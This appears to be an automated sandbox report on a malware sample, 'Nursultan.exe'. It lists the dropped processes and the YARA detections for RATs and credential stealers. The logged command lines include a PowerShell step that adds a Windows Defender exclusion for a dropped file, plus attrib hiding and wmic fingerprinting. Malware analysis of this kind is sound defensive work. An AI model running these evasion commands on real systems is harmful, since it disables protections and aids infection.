                                      2024-09-06 23:49:15 UTC1091INData Raw: 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.
                                      2024-09-06 23:49:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:19:46:54
                                      Start date:06/09/2024
                                      Path:C:\Users\user\Desktop\Nursultan.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\Desktop\Nursultan.exe"
                                      Imagebase:0x4b0000
                                      File size:920'064 bytes
                                      MD5 hash:CCFA4401DF6DCAEF4265F5EDD06F3FDE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2042796854.0000000012898000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2042796854.0000000012898000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:19:46:56
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Nursultan.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                                      Imagebase:0x720000
                                      File size:805'888 bytes
                                      MD5 hash:A99954BFF017983BF455DE31C5F0696A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 92%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:19:46:57
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                                      Imagebase:0xb80000
                                      File size:212'480 bytes
                                      MD5 hash:C2A5CD7C5F8A633BAFB54B62CEE38077
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000000.2041682947.0000000000B82000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000000.2041682947.0000000000B82000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.3293638320.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.3336137166.0000000012EF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.3336137166.0000000012EF1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, Author: ditekSHen
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 84%, ReversingLabs
                                      Reputation:low
                                      Has exited:false

                                      General

                                      Target ID:4
                                      Start time:19:46:59
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Nursultan2.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                                      Imagebase:0xc10000
                                      File size:606'720 bytes
                                      MD5 hash:0BA8218F991E81620F31083273EE7D91
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000004.00000002.2105694869.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 88%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:19:46:59
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Nursultan.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                                      Imagebase:0xcf0000
                                      File size:805'888 bytes
                                      MD5 hash:A99954BFF017983BF455DE31C5F0696A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:6
                                      Start time:19:47:01
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe'
                                      Imagebase:0x7ff7be880000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:7
                                      Start time:19:47:01
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:8
                                      Start time:19:47:02
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:9
                                      Start time:19:47:02
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:10
                                      Start time:19:47:02
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Nursultan2.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                                      Imagebase:0x560000
                                      File size:606'720 bytes
                                      MD5 hash:0BA8218F991E81620F31083273EE7D91
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 0000000A.00000002.2130667385.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:11
                                      Start time:19:47:02
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Insidious.exe"
                                      Imagebase:0x24510880000
                                      File size:281'088 bytes
                                      MD5 hash:B70C03532081C928F946E844C5D2172D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_BlackGuard, Description: Yara detected BlackGuard, Source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RagsStealer, Description: Yara detected Rags Stealer, Source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_44CaliberStealer, Description: Yara detected 44Caliber Stealer, Source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2166607567.0000024512651000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RagsStealer, Description: Yara detected Rags Stealer, Source: 0000000B.00000002.2166607567.0000024512651000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 0000000B.00000002.2166607567.0000024512696000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_BlackGuard, Description: Yara detected BlackGuard, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: Joe Security
                                      • Rule: JoeSecurity_RagsStealer, Description: Yara detected Rags Stealer, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: Joe Security
                                      • Rule: JoeSecurity_44CaliberStealer, Description: Yara detected 44Caliber Stealer, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: ditekSHen
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: ditekSHen
                                      • Rule: MALWARE_Win_A310Logger, Description: Detects A310Logger, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: ditekSHen
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 88%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:12
                                      Start time:19:47:02
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Nursultan.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                                      Imagebase:0x300000
                                      File size:805'888 bytes
                                      MD5 hash:A99954BFF017983BF455DE31C5F0696A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:13
                                      Start time:19:47:02
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                                      Imagebase:0x1e0000
                                      File size:212'480 bytes
                                      MD5 hash:C2A5CD7C5F8A633BAFB54B62CEE38077
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:14
                                      Start time:19:47:02
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Umbral.exe"
                                      Imagebase:0x1dcb4050000
                                      File size:236'544 bytes
                                      MD5 hash:DF69E1468A4656F2EEC526DE59A89A8B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 0000000E.00000002.2590100139.000001DCB6688000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 0000000E.00000002.2590100139.000001DCB6724000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, Author: Joe Security
                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, Author: ditekSHen
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 92%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:15
                                      Start time:19:47:03
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:16
                                      Start time:19:47:03
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:17
                                      Start time:19:47:03
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:18
                                      Start time:19:47:03
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff61de30000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:19
                                      Start time:19:47:03
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\timeout.exe
                                      Wow64 process (32bit):false
                                      Commandline:timeout 4 /nobreak
                                      Imagebase:0x7ff622290000
                                      File size:32'768 bytes
                                      MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:20
                                      Start time:19:47:04
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      General

                                      Target ID:21
                                      Start time:19:47:05
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                      Wow64 process (32bit):false
                                      Commandline:"wmic.exe" csproduct get uuid
                                      Imagebase:0x7ff7daad0000
                                      File size:576'000 bytes
                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:22
                                      Start time:19:47:05
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      General

                                      Target ID:23
                                      Start time:19:47:05
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Insidious.exe"
                                      Imagebase:0x2acce430000
                                      File size:281'088 bytes
                                      MD5 hash:B70C03532081C928F946E844C5D2172D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_RagsStealer, Description: Yara detected Rags Stealer, Source: 00000017.00000002.2134605998.000002ACD01C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Has exited:true

                                      General

                                      Target ID:24
                                      Start time:19:47:05
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:25
                                      Start time:19:47:05
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Nursultan2.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                                      Imagebase:0xe0000
                                      File size:606'720 bytes
                                      MD5 hash:0BA8218F991E81620F31083273EE7D91
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:26
                                      Start time:19:47:05
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                                      Imagebase:0xb30000
                                      File size:212'480 bytes
                                      MD5 hash:C2A5CD7C5F8A633BAFB54B62CEE38077
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:27
                                      Start time:19:47:05
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Umbral.exe"
                                      Imagebase:0x22382010000
                                      File size:236'544 bytes
                                      MD5 hash:DF69E1468A4656F2EEC526DE59A89A8B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:28
                                      Start time:19:47:05
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Nursultan.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                                      Imagebase:0xfe0000
                                      File size:805'888 bytes
                                      MD5 hash:A99954BFF017983BF455DE31C5F0696A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:29
                                      Start time:19:47:06
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:30
                                      Start time:19:47:06
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:31
                                      Start time:19:47:06
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:32
                                      Start time:19:47:06
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff61de30000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:33
                                      Start time:19:47:06
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\timeout.exe
                                      Wow64 process (32bit):false
                                      Commandline:timeout 4 /nobreak
                                      Imagebase:0x7ff622290000
                                      File size:32'768 bytes
                                      MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:35
                                      Start time:19:47:07
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\mode.com
                                      Wow64 process (32bit):false
                                      Commandline:mode con: cols=103 lines=21
                                      Imagebase:0x7ff686c50000
                                      File size:33'280 bytes
                                      MD5 hash:BEA7464830980BF7C0490307DB4FC875
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:36
                                      Start time:19:47:07
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      General

                                      Target ID:37
                                      Start time:19:47:08
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      General

                                      Target ID:38
                                      Start time:19:47:08
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Insidious.exe"
                                      Imagebase:0x1cfac150000
                                      File size:281'088 bytes
                                      MD5 hash:B70C03532081C928F946E844C5D2172D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_RagsStealer, Description: Yara detected Rags Stealer, Source: 00000026.00000002.2168782168.000001CFADD75000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Has exited:true

                                      General

                                      Target ID:39
                                      Start time:19:47:08
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                                      Imagebase:0xc10000
                                      File size:212'480 bytes
                                      MD5 hash:C2A5CD7C5F8A633BAFB54B62CEE38077
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:40
                                      Start time:19:47:08
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\attrib.exe
                                      Wow64 process (32bit):false
                                      Commandline:"attrib.exe" +h +s "C:\Users\user\AppData\Local\Temp\Umbral.exe"
                                      Imagebase:0x7ff7aa790000
                                      File size:23'040 bytes
                                      MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:41
                                      Start time:19:47:08
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
